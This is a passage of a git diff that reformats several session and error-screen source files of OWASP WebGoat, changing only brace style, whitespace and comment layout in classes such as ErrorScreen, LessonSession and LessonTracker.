-		Table layout = new Table().setBgColor( HtmlColor.WHITE ).setCellSpacing( 0 ).setCellPadding( 0 ).setBorder( 0 );
+		TD lowerright = new TD().setHeight("100%").setVAlign("top").setAlign("left").addElement(form);
+		TR row = new TR().addElement(lowerright);
+		Table layout = new Table().setBgColor(HtmlColor.WHITE).setCellSpacing(0).setCellPadding(0).setBorder(0);
 
-        layout.addElement( row );
-   
-         setContent(layout);
+		layout.addElement(row);
+
+		setContent(layout);
 	}
 
-	protected Element wrapForm( WebSession s )
+	protected Element wrapForm(WebSession s)
 	{
-		if ( s == null )
-		{
-			return new StringElement( "Invalid Session" );
-		}
+		if (s == null) { return new StringElement("Invalid Session"); }
+
+		Table container = new Table().setWidth("100%").setCellSpacing(10).setCellPadding(0).setBorder(0);
 
-		Table container = new Table().setWidth( "100%" ).setCellSpacing( 10 ).setCellPadding( 0 ).setBorder( 0 );
-		
 		// CreateContent can generate error messages so you MUST call it before makeMessages()
-		Element content = createContent( s );
-		container.addElement( new TR().addElement( new TD().setColSpan( 2 ).setVAlign( "TOP" ).addElement(
-				makeMessages( s ) ) ) );
-		container.addElement( new TR().addElement( new TD().setColSpan( 2 ).addElement( content ) ) );
-		container.addElement( new TR() );
+		Element content = createContent(s);
+		container.addElement(new TR().addElement(new TD().setColSpan(2).setVAlign("TOP").addElement(makeMessages(s))));
+		container.addElement(new TR().addElement(new TD().setColSpan(2).addElement(content)));
+		container.addElement(new TR());
 
-		return ( container );
+		return (container);
 	}
 
 	/**
-	 *  Description of the Method
-	 *
-	 * @param  s  Description of the Parameter
-	 * @return    Description of the Return Value
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
 	 */
-	protected Element createContent( WebSession s )
+	protected Element createContent(WebSession s)
 	{
-		System.out.println( "errorscreen createContent Error:" + this.error + " message:" + this.message );
+		System.out.println("errorscreen createContent Error:" + this.error + " message:" + this.message);
 
 		Element content;
 
-		if ( this.error != null )
+		if (this.error != null)
 		{
-			content = createContent( this.error );
+			content = createContent(this.error);
 		}
-		else if ( this.message != null )
+		else if (this.message != null)
 		{
-			content = createContent( this.message );
+			content = createContent(this.message);
 		}
 		else
 		{
-			content = new StringElement( "An unknown error occurred." );
+			content = new StringElement("An unknown error occurred.");
 		}
 
 		return content;
 	}
 
-
 	/**
-	 *  Description of the Method
-	 *
-	 * @param  s  Description of the Parameter
-	 * @return    Description of the Return Value
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
 	 */
-	protected Element createContent( String s )
+	protected Element createContent(String s)
 	{
-		StringElement list = new StringElement( s );
+		StringElement list = new StringElement(s);
 
-		return ( list );
+		return (list);
 	}
 
-
 	/**
-	 *  Description of the Method
-	 *
-	 * @param  t  Description of the Parameter
-	 * @return    Description of the Return Value
+	 * Description of the Method
+	 * 
+	 * @param t
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
 	 */
-	protected Element createContent( Throwable t )
+	protected Element createContent(Throwable t)
 	{
 		StringElement list = new StringElement();
-		list.addElement( new H2().addElement( new StringElement( "Error Message: " + t.getMessage() ) ) );
-		list.addElement( formatStackTrace( t ) );
+		list.addElement(new H2().addElement(new StringElement("Error Message: " + t.getMessage())));
+		list.addElement(formatStackTrace(t));
 
-		if ( t instanceof ServletException )
+		if (t instanceof ServletException)
 		{
-			Throwable root = ( (ServletException) t ).getRootCause();
+			Throwable root = ((ServletException) t).getRootCause();
 
-			if ( root != null )
+			if (root != null)
 			{
-				list.addElement( new H2().addElement( new StringElement( "Root Message: " + root.getMessage() ) ) );
-				list.addElement( formatStackTrace( root ) );
+				list.addElement(new H2().addElement(new StringElement("Root Message: " + root.getMessage())));
+				list.addElement(formatStackTrace(root));
 			}
 		}
 
-		return ( new Small().addElement( list ) );
+		return (new Small().addElement(list));
 	}
 
 	public Element getCredits()
@@ -222,57 +214,56 @@ public class ErrorScreen extends Screen
 		return new ElementContainer();
 	}
 
-
 	/**
-	 *  Description of the Method
-	 *
-	 * @param  t  Description of the Parameter
-	 * @return    Description of the Return Value
+	 * Description of the Method
+	 * 
+	 * @param t
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
 	 */
-	public static Element formatStackTrace( Throwable t )
+	public static Element formatStackTrace(Throwable t)
 	{
-		String trace = getStackTrace( t );
+		String trace = getStackTrace(t);
 		StringElement list = new StringElement();
-		StringTokenizer st = new StringTokenizer( trace, "\r\n\t" );
+		StringTokenizer st = new StringTokenizer(trace, "\r\n\t");
 
-		while ( st.hasMoreTokens() )
+		while (st.hasMoreTokens())
 		{
 			String line = st.nextToken();
-			list.addElement( new Div( line ) );
+			list.addElement(new Div(line));
 		}
 
-		return ( list );
+		return (list);
 	}
 
-
 	/**
-	 *  Gets the stackTrace attribute of the ErrorScreen class
-	 *
-	 * @param  t  Description of the Parameter
-	 * @return    The stackTrace value
+	 * Gets the stackTrace attribute of the ErrorScreen class
+	 * 
+	 * @param t
+	 *            Description of the Parameter
+	 * @return The stackTrace value
 	 */
-	public static String getStackTrace( Throwable t )
+	public static String getStackTrace(Throwable t)
 	{
 		ByteArrayOutputStream bytes = new ByteArrayOutputStream();
-		PrintWriter writer = new PrintWriter( bytes, true );
-		t.printStackTrace( writer );
+		PrintWriter writer = new PrintWriter(bytes, true);
+		t.printStackTrace(writer);
 
-		return ( bytes.toString() );
+		return (bytes.toString());
 	}
 
-
 	/**
-	 *  Gets the title attribute of the ErrorScreen object
-	 *
-	 * @return    The title value
+	 * Gets the title attribute of the ErrorScreen object
+	 * 
+	 * @return The title value
 	 */
 	public String getTitle()
 	{
-		return ( "Error" );
+		return ("Error");
 	}
-	
-	public String getRole() {
+
+	public String getRole()
+	{
 		return AbstractLesson.USER_ROLE;
 	}
 }
-
diff --git a/main/project/JavaSource/org/owasp/webgoat/session/LessonSession.java b/main/project/JavaSource/org/owasp/webgoat/session/LessonSession.java
index edc1b16f6..5a8afc1f9 100644
--- a/main/project/JavaSource/org/owasp/webgoat/session/LessonSession.java
+++ b/main/project/JavaSource/org/owasp/webgoat/session/LessonSession.java
@@ -1,36 +1,34 @@
+
 package org.owasp.webgoat.session;
 
-/*******************************************************************************
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
- * Represents a virtual session for a lesson.  Lesson-specific session data may
- * be stored here.
+ * 
+ * Represents a virtual session for a lesson. Lesson-specific session data may be stored here.
  * 
  * @author David Anderson <a href="http://www.aspectsecurity.com">Aspect Security</a>
  * @created January 19, 2006
@@ -38,32 +36,28 @@ package org.owasp.webgoat.session;
 public class LessonSession
 {
 
-    private boolean isAuthenticated = false;
+	private boolean isAuthenticated = false;
 
-    private String currentLessonScreen;
+	private String currentLessonScreen;
 
+	public void setAuthenticated(boolean isAuthenticated)
+	{
+		this.isAuthenticated = isAuthenticated;
+	}
 
-    public void setAuthenticated(boolean isAuthenticated)
-    {
-	this.isAuthenticated = isAuthenticated;
-    }
+	public boolean isAuthenticated()
+	{
+		return this.isAuthenticated;
+	}
 
+	public void setCurrentLessonScreen(String currentLessonScreen)
+	{
+		this.currentLessonScreen = currentLessonScreen;
+	}
 
-    public boolean isAuthenticated()
-    {
-	return this.isAuthenticated;
-    }
-
-
-    public void setCurrentLessonScreen(String currentLessonScreen)
-    {
-	this.currentLessonScreen = currentLessonScreen;
-    }
-
-
-    public String getCurrentLessonScreen()
-    {
-	return this.currentLessonScreen;
-    }
+	public String getCurrentLessonScreen()
+	{
+		return this.currentLessonScreen;
+	}
 
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/session/LessonTracker.java b/main/project/JavaSource/org/owasp/webgoat/session/LessonTracker.java
index bfb8bcfbf..dcc323d4c 100644
--- a/main/project/JavaSource/org/owasp/webgoat/session/LessonTracker.java
+++ b/main/project/JavaSource/org/owasp/webgoat/session/LessonTracker.java
@@ -1,3 +1,4 @@
+
 package org.owasp.webgoat.session;
 
 import java.io.FileInputStream;
@@ -5,441 +6,399 @@ import java.io.FileNotFoundException;
 import java.io.FileOutputStream;
 import java.util.Properties;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
- * @author     Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
- * @created    October 29, 2003
+ * 
+ * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
+ * @created October 29, 2003
  */
 public class LessonTracker
 {
 
-    private boolean completed = false;
+	private boolean completed = false;
 
-    private int maxHintLevel = 0;
+	private int maxHintLevel = 0;
 
-    private int numVisits = 0;
+	private int numVisits = 0;
 
-    private boolean viewedCookies = false;
+	private boolean viewedCookies = false;
 
-    private boolean viewedHtml = false;
+	private boolean viewedHtml = false;
 
-    private boolean viewedLessonPlan = false;
+	private boolean viewedLessonPlan = false;
 
-    private boolean viewedParameters = false;
+	private boolean viewedParameters = false;
 
-    private boolean viewedSource = false;
+	private boolean viewedSource = false;
 
-    private boolean viewedSolution = false;
+	private boolean viewedSolution = false;
 
-    Properties lessonProperties = new Properties();
+	Properties lessonProperties = new Properties();
 
-
-    /**
-     *  Gets the completed attribute of the LessonTracker object
-     *
-     * @return    The completed value
-     */
-    public boolean getCompleted()
-    {
-	return completed;
-    }
-
-
-    /**
-     *  Gets the maxHintLevel attribute of the LessonTracker object
-     *
-     * @return    The maxHintLevel value
-     */
-    public int getMaxHintLevel()
-    {
-	return maxHintLevel;
-    }
-
-
-    /**
-     *  Gets the numVisits attribute of the LessonTracker object
-     *
-     * @return    The numVisits value
-     */
-    public int getNumVisits()
-    {
-	return numVisits;
-    }
-
-
-    /**
-     *  Gets the viewedCookies attribute of the LessonTracker object
-     *
-     * @return    The viewedCookies value
-     */
-    public boolean getViewedCookies()
-    {
-	return viewedCookies;
-    }
-
-
-    /**
-     *  Gets the viewedHtml attribute of the LessonTracker object
-     *
-     * @return    The viewedHtml value
-     */
-    public boolean getViewedHtml()
-    {
-	return viewedHtml;
-    }
-
-
-    /**
-     *  Gets the viewedLessonPlan attribute of the LessonTracker object
-     *
-     * @return    The viewedLessonPlan value
-     */
-    public boolean getViewedLessonPlan()
-    {
-	return viewedLessonPlan;
-    }
-
-
-    /**
-     *  Gets the viewedParameters attribute of the LessonTracker object
-     *
-     * @return    The viewedParameters value
-     */
-    public boolean getViewedParameters()
-    {
-	return viewedParameters;
-    }
-
-
-    /**
-     *  Gets the viewedSource attribute of the LessonTracker object
-     *
-     * @return    The viewedSource value
-     */
-    public boolean getViewedSource()
-    {
-	return viewedSource;
-    }
-
-
-    public boolean getViewedSolution()
-    {
-	return viewedSource;
-    }
-
-    /**
-     *  Description of the Method
-     */
-    public void incrementNumVisits()
-    {
-	numVisits++;
-    }
-
-
-    /**
-     *  Sets the properties attribute of the LessonTracker object
-     *
-     * @param  props  The new properties value
-     */
-    protected void setProperties(Properties props, Screen screen)
-    {
-	completed = Boolean.valueOf(
-		props.getProperty(screen.getTitle() + ".completed"))
-		.booleanValue();
-	maxHintLevel = Integer.parseInt(props.getProperty(screen.getTitle()
-		+ ".maxHintLevel"));
-	numVisits = Integer.parseInt(props.getProperty(screen.getTitle()
-		+ ".numVisits"));
-	viewedCookies = Boolean.valueOf(
-		props.getProperty(screen.getTitle() + ".viewedCookies"))
-		.booleanValue();
-	viewedHtml = Boolean.valueOf(
-		props.getProperty(screen.getTitle() + ".viewedHtml"))
-		.booleanValue();
-	viewedLessonPlan = Boolean.valueOf(
-		props.getProperty(screen.getTitle() + ".viewedLessonPlan"))
-		.booleanValue();
-	viewedParameters = Boolean.valueOf(
-		props.getProperty(screen.getTitle() + ".viewedParameters"))
-		.booleanValue();
-	viewedSource = Boolean.valueOf(
-		props.getProperty(screen.getTitle() + ".viewedSource"))
-		.booleanValue();
-    }
-
-
-    public static String getUserDir(WebSession s)
-    {
-	return s.getContext().getRealPath("users") + "/";
-    }
-
-
-    private static String getTrackerFile(WebSession s, String user,
-	    Screen screen)
-    {
-	return getUserDir(s) + user + "." + screen.getClass().getName()
-		+ ".props";
-    }
-
-
-    /**
-     *  Description of the Method
-     *
-     * @param  screen  Description of the Parameter
-     * @param  s       Description of the Parameter
-     * @return         Description of the Return Value
-     */
-    public static LessonTracker load(WebSession s, String user, Screen screen)
-    {
-	FileInputStream in = null;
-	try
+	/**
+	 * Gets the completed attribute of the LessonTracker object
+	 * 
+	 * @return The completed value
+	 */
+	public boolean getCompleted()
 	{
-	    String fileName = getTrackerFile(s, user, screen);
-	    if (fileName != null)
-	    {
-		Properties tempProps = new Properties();
-		//System.out.println("Loading lesson state from: " + fileName);
-		in = new FileInputStream(fileName);
-		tempProps.load(in);
-		// allow the screen to use any custom properties it may have set
-		LessonTracker tempLessonTracker = screen
-			.createLessonTracker(tempProps);
-		tempLessonTracker.setProperties(tempProps, screen);
-		return tempLessonTracker;
-	    }
-	}
-	catch (FileNotFoundException e)
-	{
-	    // Normal if the lesson has not been accessed yet.
-	}
-	catch (Exception e)
-	{
-	    System.out.println("Failed to load lesson state for " + screen);
-	    e.printStackTrace();
-	}
-	finally
-	{
-	    try
-	    {
-		in.close();
-	    }
-	    catch (Exception e)
-	    {}
+		return completed;
 	}
 
-	return screen.createLessonTracker();
-    }
-
-
-    /**
-     *  Sets the completed attribute of the LessonTracker object
-     *
-     * @param  completed  The new completed value
-     */
-    public void setCompleted(boolean completed)
-    {
-	this.completed = completed;
-    }
-
-
-    /**
-     *  Sets the maxHintLevel attribute of the LessonTracker object
-     *
-     * @param  maxHintLevel  The new maxHintLevel value
-     */
-    public void setMaxHintLevel(int maxHintLevel)
-    {
-	this.maxHintLevel = Math.max(this.maxHintLevel, maxHintLevel);
-    }
-
-
-    /**
-     *  Sets the viewedCookies attribute of the LessonTracker object
-     *
-     * @param  viewedCookies  The new viewedCookies value
-     */
-    public void setViewedCookies(boolean viewedCookies)
-    {
-	this.viewedCookies = viewedCookies;
-    }
-
-
-    /**
-     *  Sets the viewedHtml attribute of the LessonTracker object
-     *
-     * @param  viewedHtml  The new viewedHtml value
-     */
-    public void setViewedHtml(boolean viewedHtml)
-    {
-	this.viewedHtml = viewedHtml;
-    }
-
-
-    /**
-     *  Sets the viewedLessonPlan attribute of the LessonTracker object
-     *
-     * @param  viewedLessonPlan  The new viewedLessonPlan value
-     */
-    public void setViewedLessonPlan(boolean viewedLessonPlan)
-    {
-	this.viewedLessonPlan = viewedLessonPlan;
-    }
-
-
-    /**
-     *  Sets the viewedParameters attribute of the LessonTracker object
-     *
-     * @param  viewedParameters  The new viewedParameters value
-     */
-    public void setViewedParameters(boolean viewedParameters)
-    {
-	this.viewedParameters = viewedParameters;
-    }
-
-
-    /**
-     *  Sets the viewedSource attribute of the LessonTracker object
-     *
-     * @param  viewedSource  The new viewedSource value
-     */
-    public void setViewedSource(boolean viewedSource)
-    {
-	this.viewedSource = viewedSource;
-    }
-
-    /**
-     *  Sets the viewedSource attribute of the LessonTracker object
-     *
-     * @param  viewedSource  The new viewedSource value
-     */
-    public void setViewedSolution(boolean viewedSolution)
-    {
-	this.viewedSolution = viewedSolution;
-    }
-
-    /**
-     *  Allows the storing of properties for the logged in and a screen.
-     *
-     * @param  s  Description of the Parameter
-     */
-    public void store(WebSession s, Screen screen)
-    {
-	store(s, screen, s.getUserName());
-    }
-
-
-    /**
-     *  Allows the storing of properties for a user and a screen.
-     *
-     * @param  s  Description of the Parameter
-     */
-    public void store(WebSession s, Screen screen, String user)
-    {
-	FileOutputStream out = null;
-	String fileName = getTrackerFile(s, user, screen);
-	//System.out.println( "Storing data to" + fileName );
-	lessonProperties.setProperty(screen.getTitle() + ".completed", Boolean
-		.toString(completed));
-	lessonProperties.setProperty(screen.getTitle() + ".maxHintLevel",
-		Integer.toString(maxHintLevel));
-	lessonProperties.setProperty(screen.getTitle() + ".numVisits", Integer
-		.toString(numVisits));
-	lessonProperties.setProperty(screen.getTitle() + ".viewedCookies",
-		Boolean.toString(viewedCookies));
-	lessonProperties.setProperty(screen.getTitle() + ".viewedHtml", Boolean
-		.toString(viewedHtml));
-	lessonProperties.setProperty(screen.getTitle() + ".viewedLessonPlan",
-		Boolean.toString(viewedLessonPlan));
-	lessonProperties.setProperty(screen.getTitle() + ".viewedParameters",
-		Boolean.toString(viewedParameters));
-	lessonProperties.setProperty(screen.getTitle() + ".viewedSource",
-		Boolean.toString(viewedSource));
-	try
+	/**
+	 * Gets the maxHintLevel attribute of the LessonTracker object
+	 * 
+	 * @return The maxHintLevel value
+	 */
+	public int getMaxHintLevel()
 	{
-	    out = new FileOutputStream(fileName);
-	    lessonProperties.store(out, s.getUserName());
-	}
-	catch (Exception e)
-	{
-	    // what do we want to do,  I think nothing.
-	    System.out.println("Warning User data for " + s.getUserName()
-		    + " will not persist");
-	}
-	finally
-	{
-	    try
-	    {
-		out.close();
-	    }
-	    catch (Exception e)
-	    {}
+		return maxHintLevel;
 	}
 
-    }
+	/**
+	 * Gets the numVisits attribute of the LessonTracker object
+	 * 
+	 * @return The numVisits value
+	 */
+	public int getNumVisits()
+	{
+		return numVisits;
+	}
 
+	/**
+	 * Gets the viewedCookies attribute of the LessonTracker object
+	 * 
+	 * @return The viewedCookies value
+	 */
+	public boolean getViewedCookies()
+	{
+		return viewedCookies;
+	}
 
-    /**
-     *  Description of the Method
-     *
-     * @return    Description of the Return Value
-     */
-    public String toString()
-    {
-	StringBuffer buff = new StringBuffer();
-	buff.append("LessonTracker:" + "\n");
-	buff.append("    - completed:.......... " + completed + "\n");
-	buff.append("    - maxHintLevel:....... " + maxHintLevel + "\n");
-	buff.append("    - numVisits:.......... " + numVisits + "\n");
-	buff.append("    - viewedCookies:...... " + viewedCookies + "\n");
-	buff.append("    - viewedHtml:......... " + viewedHtml + "\n");
-	buff.append("    - viewedLessonPlan:... " + viewedLessonPlan + "\n");
-	buff.append("    - viewedParameters:... " + viewedParameters + "\n");
-	buff.append("    - viewedSource:....... " + viewedSource + "\n" + "\n");
-	return buff.toString();
-    }
+	/**
+	 * Gets the viewedHtml attribute of the LessonTracker object
+	 * 
+	 * @return The viewedHtml value
+	 */
+	public boolean getViewedHtml()
+	{
+		return viewedHtml;
+	}
 
+	/**
+	 * Gets the viewedLessonPlan attribute of the LessonTracker object
+	 * 
+	 * @return The viewedLessonPlan value
+	 */
+	public boolean getViewedLessonPlan()
+	{
+		return viewedLessonPlan;
+	}
 
-    /**
-     * @return Returns the lessonProperties.
-     */
-    public Properties getLessonProperties()
-    {
-	return lessonProperties;
-    }
+	/**
+	 * Gets the viewedParameters attribute of the LessonTracker object
+	 * 
+	 * @return The viewedParameters value
+	 */
+	public boolean getViewedParameters()
+	{
+		return viewedParameters;
+	}
 
+	/**
+	 * Gets the viewedSource attribute of the LessonTracker object
+	 * 
+	 * @return The viewedSource value
+	 */
+	public boolean getViewedSource()
+	{
+		return viewedSource;
+	}
 
-    /**
-     * @param lessonProperties The lessonProperties to set.
-     */
-    public void setLessonProperties(Properties lessonProperties)
-    {
-	this.lessonProperties = lessonProperties;
-    }
+	public boolean getViewedSolution()
+	{
+		return viewedSource;
+	}
+
+	/**
+	 * Description of the Method
+	 */
+	public void incrementNumVisits()
+	{
+		numVisits++;
+	}
+
+	/**
+	 * Sets the properties attribute of the LessonTracker object
+	 * 
+	 * @param props
+	 *            The new properties value
+	 */
+	protected void setProperties(Properties props, Screen screen)
+	{
+		completed = Boolean.valueOf(props.getProperty(screen.getTitle() + ".completed")).booleanValue();
+		maxHintLevel = Integer.parseInt(props.getProperty(screen.getTitle() + ".maxHintLevel"));
+		numVisits = Integer.parseInt(props.getProperty(screen.getTitle() + ".numVisits"));
+		viewedCookies = Boolean.valueOf(props.getProperty(screen.getTitle() + ".viewedCookies")).booleanValue();
+		viewedHtml = Boolean.valueOf(props.getProperty(screen.getTitle() + ".viewedHtml")).booleanValue();
+		viewedLessonPlan = Boolean.valueOf(props.getProperty(screen.getTitle() + ".viewedLessonPlan")).booleanValue();
+		viewedParameters = Boolean.valueOf(props.getProperty(screen.getTitle() + ".viewedParameters")).booleanValue();
+		viewedSource = Boolean.valueOf(props.getProperty(screen.getTitle() + ".viewedSource")).booleanValue();
+	}
+
+	public static String getUserDir(WebSession s)
+	{
+		return s.getContext().getRealPath("users") + "/";
+	}
+
+	private static String getTrackerFile(WebSession s, String user, Screen screen)
+	{
+		return getUserDir(s) + user + "." + screen.getClass().getName() + ".props";
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param screen
+	 *            Description of the Parameter
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	public static LessonTracker load(WebSession s, String user, Screen screen)
+	{
+		FileInputStream in = null;
+		try
+		{
+			String fileName = getTrackerFile(s, user, screen);
+			if (fileName != null)
+			{
+				Properties tempProps = new Properties();
+				// System.out.println("Loading lesson state from: " + fileName);
+				in = new FileInputStream(fileName);
+				tempProps.load(in);
+				// allow the screen to use any custom properties it may have set
+				LessonTracker tempLessonTracker = screen.createLessonTracker(tempProps);
+				tempLessonTracker.setProperties(tempProps, screen);
+				return tempLessonTracker;
+			}
+		} catch (FileNotFoundException e)
+		{
+			// Normal if the lesson has not been accessed yet.
+		} catch (Exception e)
+		{
+			System.out.println("Failed to load lesson state for " + screen);
+			e.printStackTrace();
+		} finally
+		{
+			try
+			{
+				in.close();
+			} catch (Exception e)
+			{
+			}
+		}
+
+		return screen.createLessonTracker();
+	}
+
+	/**
+	 * Sets the completed attribute of the LessonTracker object
+	 * 
+	 * @param completed
+	 *            The new completed value
+	 */
+	public void setCompleted(boolean completed)
+	{
+		this.completed = completed;
+	}
+
+	/**
+	 * Sets the maxHintLevel attribute of the LessonTracker object
+	 * 
+	 * @param maxHintLevel
+	 *            The new maxHintLevel value
+	 */
+	public void setMaxHintLevel(int maxHintLevel)
+	{
+		this.maxHintLevel = Math.max(this.maxHintLevel, maxHintLevel);
+	}
+
+	/**
+	 * Sets the viewedCookies attribute of the LessonTracker object
+	 * 
+	 * @param viewedCookies
+	 *            The new viewedCookies value
+	 */
+	public void setViewedCookies(boolean viewedCookies)
+	{
+		this.viewedCookies = viewedCookies;
+	}
+
+	/**
+	 * Sets the viewedHtml attribute of the LessonTracker object
+	 * 
+	 * @param viewedHtml
+	 *            The new viewedHtml value
+	 */
+	public void setViewedHtml(boolean viewedHtml)
+	{
+		this.viewedHtml = viewedHtml;
+	}
+
+	/**
+	 * Sets the viewedLessonPlan attribute of the LessonTracker object
+	 * 
+	 * @param viewedLessonPlan
+	 *            The new viewedLessonPlan value
+	 */
+	public void setViewedLessonPlan(boolean viewedLessonPlan)
+	{
+		this.viewedLessonPlan = viewedLessonPlan;
+	}
+
+	/**
+	 * Sets the viewedParameters attribute of the LessonTracker object
+	 * 
+	 * @param viewedParameters
+	 *            The new viewedParameters value
+	 */
+	public void setViewedParameters(boolean viewedParameters)
+	{
+		this.viewedParameters = viewedParameters;
+	}
+
+	/**
+	 * Sets the viewedSource attribute of the LessonTracker object
+	 * 
+	 * @param viewedSource
+	 *            The new viewedSource value
+	 */
+	public void setViewedSource(boolean viewedSource)
+	{
+		this.viewedSource = viewedSource;
+	}
+
+	/**
+	 * Sets the viewedSource attribute of the LessonTracker object
+	 * 
+	 * @param viewedSource
+	 *            The new viewedSource value
+	 */
+	public void setViewedSolution(boolean viewedSolution)
+	{
+		this.viewedSolution = viewedSolution;
+	}
+
+	/**
+	 * Allows the storing of properties for the logged in and a screen.
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 */
+	public void store(WebSession s, Screen screen)
+	{
+		store(s, screen, s.getUserName());
+	}
+
+	/**
+	 * Allows the storing of properties for a user and a screen.
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 */
+	public void store(WebSession s, Screen screen, String user)
+	{
+		FileOutputStream out = null;
+		String fileName = getTrackerFile(s, user, screen);
+		// System.out.println( "Storing data to" + fileName );
+		lessonProperties.setProperty(screen.getTitle() + ".completed", Boolean.toString(completed));
+		lessonProperties.setProperty(screen.getTitle() + ".maxHintLevel", Integer.toString(maxHintLevel));
+		lessonProperties.setProperty(screen.getTitle() + ".numVisits", Integer.toString(numVisits));
+		lessonProperties.setProperty(screen.getTitle() + ".viewedCookies", Boolean.toString(viewedCookies));
+		lessonProperties.setProperty(screen.getTitle() + ".viewedHtml", Boolean.toString(viewedHtml));
+		lessonProperties.setProperty(screen.getTitle() + ".viewedLessonPlan", Boolean.toString(viewedLessonPlan));
+		lessonProperties.setProperty(screen.getTitle() + ".viewedParameters", Boolean.toString(viewedParameters));
+		lessonProperties.setProperty(screen.getTitle() + ".viewedSource", Boolean.toString(viewedSource));
+		try
+		{
+			out = new FileOutputStream(fileName);
+			lessonProperties.store(out, s.getUserName());
+		} catch (Exception e)
+		{
+			// what do we want to do, I think nothing.
+			System.out.println("Warning User data for " + s.getUserName() + " will not persist");
+		} finally
+		{
+			try
+			{
+				out.close();
+			} catch (Exception e)
+			{
+			}
+		}
+
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @return Description of the Return Value
+	 */
+	public String toString()
+	{
+		StringBuffer buff = new StringBuffer();
+		buff.append("LessonTracker:" + "\n");
+		buff.append("    - completed:.......... " + completed + "\n");
+		buff.append("    - maxHintLevel:....... " + maxHintLevel + "\n");
+		buff.append("    - numVisits:.......... " + numVisits + "\n");
+		buff.append("    - viewedCookies:...... " + viewedCookies + "\n");
+		buff.append("    - viewedHtml:......... " + viewedHtml + "\n");
+		buff.append("    - viewedLessonPlan:... " + viewedLessonPlan + "\n");
+		buff.append("    - viewedParameters:... " + viewedParameters + "\n");
+		buff.append("    - viewedSource:....... " + viewedSource + "\n" + "\n");
+		return buff.toString();
+	}
+
+	/**
+	 * @return Returns the lessonProperties.
+	 */
+	public Properties getLessonProperties()
+	{
+		return lessonProperties;
+	}
+
+	/**
+	 * @param lessonProperties
+	 *            The lessonProperties to set.
+	 */
+	public void setLessonProperties(Properties lessonProperties)
+	{
+		this.lessonProperties = lessonProperties;
+	}
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/session/Parameter.java b/main/project/JavaSource/org/owasp/webgoat/session/Parameter.java
index 7971ecf7b..7230af6c4 100644
--- a/main/project/JavaSource/org/owasp/webgoat/session/Parameter.java
+++ b/main/project/JavaSource/org/owasp/webgoat/session/Parameter.java
@@ -1,90 +1,81 @@
+
 package org.owasp.webgoat.session;
 
-/*******************************************************************************
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
